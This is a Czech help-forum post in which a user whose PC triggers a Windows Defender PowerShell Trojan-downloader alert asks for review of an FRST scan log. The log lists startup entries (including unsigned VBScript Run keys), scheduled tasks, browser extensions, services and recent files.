Dobrý den, prosím o kontrolu logu. Po startu PC vyskočí chybová hláška a Windows Defender hlásí detekci viru Trojan Downloader PowerShell.
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 19-01-2021
Ran by IRENA-PC (administrator) on IRENA-PC (20-01-2021 07:13:34)
Running from C:\Users\IRENA-PC\Desktop
Loaded Profiles: IRENA-PC
Platform: Windows 10 Pro Version 2004 19041.746 (X64) Language: Čeština (Česko)
Default browser: Chrome
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Appwork GmbH -> AppWork GmbH) C:\Users\IRENA-PC\AppData\Local\JDownloader 2.0\JDownloader2.exe
(Firebit OU -> Rainmeter) C:\Program Files\Rainmeter\Rainmeter.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe <12>
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.420.11102.0_x64__8wekyb3d8bbwe\GameBar.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.XboxGamingOverlay_5.420.11102.0_x64__8wekyb3d8bbwe\GameBarFTServer.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe <2>
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\mstsc.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe
(Open Source Developer, Robin Krom -> Greenshot) C:\Program Files\Greenshot\Greenshot.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft) C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(VIA Technologies Inc. -> VIA Technologies, Inc.) C:\Windows\System32\ViakaraokeSrv.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [Greenshot] => C:\Program Files\Greenshot\Greenshot.exe [527792 2017-01-28] (Open Source Developer, Robin Krom -> Greenshot)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-17] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Value] => C:\Program Files\MSBuild\Microsoft\sigoren.vbe [1223 2020-02-25] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Microsoft Software Essentials] => C:\ProgramData\Microsoft Essentials\Software Essentials.vbs [12320 2020-03-16] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Adobe Reader Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe [5491248 2020-12-07] (Adobe Inc. -> Adobe Systems Incorporated)
HKLM\...\Print\Monitors\us008 Langmon: C:\WINDOWS\system32\us008lm.dll [31256 2016-02-15] (Microsoft Windows Hardware Compatibility Publisher -> )
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.141\Installer\chrmstp.exe [2021-01-07] (Google LLC -> Google LLC)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Poslat do aplikace OneNote.lnk [2017-11-14]
ShortcutTarget: Poslat do aplikace OneNote.lnk -> C:\Program Files\Microsoft Office\Office16\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rainmeter.lnk [2019-10-05]
ShortcutTarget: Rainmeter.lnk -> C:\Program Files\Rainmeter\Rainmeter.exe (Firebit OU -> Rainmeter)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {0F781840-4995-487B-B8DB-7FF1EBC5C707} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [693216 2021-01-07] (Mozilla Corporation -> Mozilla Foundation)
Task: {10E62E26-1578-4A0E-8611-FFDA4C61A221} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {114D61BE-723E-4720-9A0D-15FEB326AC4B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {21567792-F593-4A2B-A8B0-FD12215C4505} - System32\Tasks\PrivaZer_SkipUAC => C:\Program Files (x86)\PrivaZer\PrivaZer.exe [19999848 2021-01-09] (Goversoft LLC -> Goversoft LLC)
Task: {2765CE0A-1B19-47DC-BC12-CDD903EF335B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {64EFD4BD-F0D7-4F88-AE46-F5DA6CEA8254} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {87D9290F-3525-4C2A-BBCB-0D49A626C8EE} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {8E9C0AAA-5D6D-45B9-8856-FD83EA5BEDC6} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9567EB88-214D-4752-88E7-2B395BCEA8D3} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {CD7FA012-E446-4088-B57D-E33EE8969426} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {DEA268E2-12DD-4984-AB28-F8F89AFCFFCA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {EB806155-3D2A-4177-A203-0FD110F04427} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {EEA50510-8C7D-45F8-BEF4-240855B8A812} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe
Task: {F4FC8779-698F-4176-95A0-5286A8AEA159} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{3ca49153-5896-4467-b2d9-205cc451433b}: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{6275ca9c-c816-47f0-8729-a3236c979e44}: [DhcpNameServer] 192.168.0.1 1.1.1.1
Edge:
=======
DownloadDir: C:\Users\IRENA-PC\Downloads
Edge DefaultProfile: Default
Edge Profile: C:\Users\IRENA-PC\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-19]
FireFox:
========
FF DefaultProfile: woy2c7nl.default-1506939824614
FF ProfilePath: C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 [2021-01-20]
FF Homepage: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://www.seznam.cz/
FF Notifications: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://sktorrent.os.tc; hxxps://kryptomagazin.cz
FF NewTabOverride: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> Disabled: {672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}
FF Extension: (HLS Video Download) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\@hls.video.download.xpi [2021-01-05]
FF Extension: (Download with Ant Download Manager) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\antffw@antdownloadmanager.com.xpi [2021-01-05]
FF Extension: (Avast Online Security) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\wrc@avast.com.xpi [2020-06-19]
FF Extension: (Video Downloader for FireFox) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}.xpi [2021-01-05]
FF Extension: (KITVideofy) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{6c09ef97-fbbc-4dc1-bc9a-777b216f1303}.xpi [2021-01-05]
FF Extension: (Plná Peněženka Lištička Lite) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{85d8e8cc-273a-4845-a75b-4b44377c703c}.xpi [2021-01-13]
FF Extension: (Video DownloadHelper) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2020-12-16]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.8 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @java.com/DTPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\dtplugin\npDeployJava1.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\plugin2\npjp2.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)
Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default [2021-01-20]
CHR DownloadDir: D:\Filmy\Seriály\Telenovely
CHR Notifications: Default -> hxxps://app.expertoption.com; hxxps://app.plus500.com; hxxps://calendar.google.com; hxxps://findmedia.biz; hxxps://ganesha.goodly.pro; hxxps://gofesm.com; hxxps://kryptomagazin.sk; hxxps://my.jdownloader.org; hxxps://prokliky.cz; hxxps://solvena.ru; hxxps://thestreetlottery.com; hxxps://trading11.com; hxxps://watch-video.net; hxxps://www.facebook.com; hxxps://www.nej-ceny.cz; hxxps://www.netflix.com; hxxps://www.publish0x.com; hxxps://www.youtube.com; hxxps://zignaly.com
CHR HomePage: Default -> hxxps://www.seznam.cz/
CHR StartupUrls: Default -> "hxxp://seznam.cz/","hxxp://www.google.cz/","hxxps://www.google.com ... oogle.com/"
CHR Extension: (Easy Auto Refresh) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aabcgdmkeabbnleenpncegpcngjpnjkc [2019-07-01]
CHR Extension: (Seznam doplněk - Esko-) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blmojkbhnkkphngknkmgccmlenfaelkd [2019-10-08]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-01-30]
CHR Extension: (Aliexpress SuperStar česky, Historie cen a koruny) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\ciclollkolafellcaolgccmfjldgpolo [2020-04-19]
CHR Extension: (YouTube Music) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cinhimbnkkaeohfgghhklpknlkffjgod [2021-01-14]
CHR Extension: (Image Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnpniohnfphhjihaiiggeabnkjhpaldj [2019-01-27]
CHR Extension: (ZenMate - IP & Browser Check) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\dchhalahcjpkabdgonjhoogdcipienhf [2017-01-30]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\egjdagpondeapnnockkjcocjdkfkffnb [2021-01-14]
CHR Extension: (Přehrávání | SledovaniTV.cz) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gccmmlklnkpaihbmbpcdknammjmmdocb [2021-01-14]
CHR Extension: (AdBlock — best ad blocker) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2021-01-15]
CHR Extension: (Stream Video Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-16]
CHR Extension: (Hangouts Google) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nckgahadagoaajjgafhacjanaoiihapd [2020-08-13]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]
CHR Extension: (SS TV Remote) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\npciacphlpgklgcjgiamnmfjipjdkacf [2020-03-23]
CHR Extension: (Gmail) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-25]
CHR Extension: (Chrome Media Router) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-12-09]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Guest Profile [2021-01-15]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\System Profile [2021-01-15]
CHR HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo]
Brave:
=======
BRA Profile: C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default [2021-01-15]
BRA Extension: (McAfee® WebAdvisor) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm\2.0.673 [2019-02-09]
BRA Extension: (Brave Local Data Files Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal [2019-02-09]
BRA Extension: (Brave Ad Block Updater (Default)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cffkpbalmllkdoenhmdmpbkajipdjfam [2019-02-23]
BRA Extension: (Brave Tor Client Updater (Windows)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cpoalefficncklhjfpglfiplenlpccdb [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm [2019-02-09]
BRA Extension: (Brave Ad Block Updater (CZE, SVK: EasyList Czech and Slovak)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\omkkefoeihpbpebhhbhmjekpnegokpbj [2019-02-23]
BRA Extension: (Brave HTTPS Everywhere Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oofiananboodjbbmdelgdommihjbkfag [2019-02-09]
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5198064 2021-01-13] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13172752 2020-01-22] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R2 VIAKaraokeService; C:\WINDOWS\system32\viakaraokesrv.exe [36504 2015-06-22] (VIA Technologies Inc. -> VIA Technologies, Inc.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [File not signed]
R2 npf; C:\WINDOWS\system32\drivers\npf.sys [36600 2018-12-07] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
R3 nuviocir; C:\WINDOWS\system32\DRIVERS\nuviocir_x64.sys [40464 2015-05-07] (Microsoft Windows Hardware Compatibility Publisher -> Nuvoton Technology Corp.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) (Whitelisted) =========
(If an entry is included in the fixlist, the file/folder will be moved.)
2021-01-20 07:13 - 2021-01-20 07:14 - 000020784 _____ C:\Users\IRENA-PC\Desktop\FRST.txt
2021-01-20 07:13 - 2021-01-20 07:13 - 000000000 ____D C:\Users\IRENA-PC\Desktop\FRST-OlderVersion
2021-01-14 04:09 - 2021-01-14 04:09 - 000000000 ___RD C:\Users\IRENA-PC\ODBA
2021-01-13 21:51 - 2021-01-13 21:51 - 000581120 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000499200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2021-01-13 21:51 - 2021-01-13 21:51 - 000467968 _____ C:\WINDOWS\system32\AssignedAccessCsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000234496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ksproxy.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000157184 _____ C:\WINDOWS\system32\uwfcsp.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000138056 _____ C:\WINDOWS\system32\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VBICodec.ax
2021-01-13 21:51 - 2021-01-13 21:51 - 000101704 _____ C:\WINDOWS\SysWOW64\HvsiManagementApi.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000095744 _____ C:\WINDOWS\system32\VirtualMonitorManager.dll
2021-01-13 21:51 - 2021-01-13 21:51 - 000067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000729600 _____ (Microsoft Corporation) C:\WINDOWS\system32\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000595968 _____ (Microsoft Corporation) C:\WINDOWS\system32\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hhctrl.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000469504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appwiz.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000455680 _____ C:\WINDOWS\SysWOW64\WindowManagementAPI.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000446976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000304128 _____ (Microsoft Corporation) C:\WINDOWS\system32\ksproxy.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000178688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\intl.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000170496 _____ (Microsoft Corporation) C:\WINDOWS\system32\VBICodec.ax
2021-01-13 21:50 - 2021-01-13 21:50 - 000087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscui.cpl
2021-01-13 21:50 - 2021-01-13 21:50 - 000072704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tdc.ocx
2021-01-13 21:50 - 2021-01-13 21:50 - 000067072 _____ C:\WINDOWS\system32\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000053760 _____ C:\WINDOWS\SysWOW64\BWContextHandler.dll
2021-01-13 21:50 - 2021-01-13 21:50 - 000010894 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2021-01-13 21:49 - 2021-01-13 21:49 - 002254336 _____ C:\WINDOWS\system32\dwmscene.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001333760 _____ C:\WINDOWS\SysWOW64\TextInputMethodFormatter.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 001162240 _____ C:\WINDOWS\system32\MBR2GPT.EXE
2021-01-13 21:49 - 2021-01-13 21:49 - 000643072 _____ C:\WINDOWS\system32\WindowManagementAPI.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000544768 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000422912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2021-01-13 21:49 - 2021-01-13 21:49 - 000330752 _____ C:\WINDOWS\SysWOW64\ssdm.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\intl.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000235520 _____ C:\WINDOWS\SysWOW64\HeatCore.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000190976 _____ C:\WINDOWS\system32\BthpanContextHandler.dll
2021-01-13 21:49 - 2021-01-13 21:49 - 000182272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\timedate.cpl
2021-01-13 21:49 - 2021-01-13 21:49 - 000152064 _____ C:\WINDOWS\system32\EoAExperiences.exe
2021-01-13 21:48 - 2021-01-13 21:48 - 002260992 _____ C:\WINDOWS\system32\TextInputMethodFormatter.dll
2021-01-13 21:48 - 2021-01-13 21:48 - 000306688 _____ C:\WINDOWS\system32\HeatCore.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000562688 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2021-01-13 21:43 - 2021-01-13 21:43 - 000455168 _____ C:\WINDOWS\system32\ssdm.dll
2021-01-13 21:43 - 2021-01-13 21:43 - 000243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\timedate.cpl
2021-01-13 21:43 - 2021-01-13 21:43 - 000165888 _____ C:\WINDOWS\system32\DataStoreCacheDumpTool.exe
2021-01-13 21:43 - 2021-01-13 21:43 - 000074240 _____ C:\WINDOWS\system32\rdsxvmaudio.dll
2021-01-13 14:04 - 2021-01-20 07:14 - 000000000 ____D C:\FRST
2021-01-13 14:00 - 2021-01-20 07:13 - 002295808 _____ (Farbar) C:\Users\IRENA-PC\Desktop\FRST64.exe
2021-01-09 18:46 - 2021-01-10 08:09 - 000002567 _____ C:\Users\IRENA-PC\Desktop\YouTube Music (2).lnk
2021-01-09 15:47 - 2021-01-09 15:47 - 000000401 _____ C:\DelFix.txt
2021-01-09 15:07 - 2021-01-09 15:07 - 000000000 ____D C:\ProgramData\Malwarebytes
2021-01-09 15:07 - 2021-01-09 15:07 - 000000000 ____D C:\Program Files\Malwarebytes
2021-01-09 08:12 - 2021-01-09 08:12 - 000000000 ____D C:\Program Files (x86)\PrivaZer
2021-01-07 13:56 - 2021-01-07 13:56 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2021-01-07 09:04 - 2021-01-09 08:06 - 000000000 ____D C:\Program Files\Mozilla Firefox
2021-01-03 08:36 - 2021-01-16 10:12 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\Exodus
2021-01-03 08:36 - 2021-01-16 10:02 - 000002280 _____ C:\Users\IRENA-PC\Desktop\Exodus.lnk
